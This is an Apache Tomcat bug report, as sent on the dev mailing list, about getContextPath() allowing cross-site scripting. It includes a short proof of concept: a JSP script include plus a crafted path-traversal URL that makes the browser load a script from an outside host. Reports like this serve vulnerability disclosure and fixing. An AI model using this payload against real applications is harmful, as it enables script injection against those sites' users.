https://bz.apache.org/bugzilla/show_bug.cgi?id=65895
Bug ID: 65895
Summary: getContextPath() might introduce a xss cross site
Product: Tomcat 9
Version: 9.0.58
Hardware: PC
OS: Mac OS X 10.1
Status: NEW
Severity: normal
Priority: P2
Component: Catalina
Assignee: dev@tomcat.apache.org
Reporter: hawkc...@potix.com
Target Milestone: -----
# steps to reproduce
1. you create a jsp page to include a js with the context path:
<script src="<%=request.getContextPath() %>/import.js"></script>
2. visit the URL below:
localhost:8080//ptst.io/xsspoc?/..;/myapp/contextpath.jsp
(assuming "myapp" is the application context path)
# Current result
a browser will load the cross-site script ptst.io/xsspoc
# Expected result
doesn't load ptst.io/xsspoc
# Other information
* I'm not sure it's a bug or not, welcome any input
* someone mentioned this issue:
https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html
* I have tried this on tomcat 7,8,9, all have the same issue
* tomcat maven plugin doesn't have this issue
<plugin>
<groupId>org.apache.tomcat.maven</groupId>
<artifactId>tomcat7-maven-plugin</artifactId>
<version>2.2</version>
<configuration>
<port>8080</port>
<path>/${project.artifactId}</path>
</configuration>
</plugin>
* jetty 9 doesn't have this issue.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org
For additional commands, e-mail: dev-h...@tomcat.apache.org
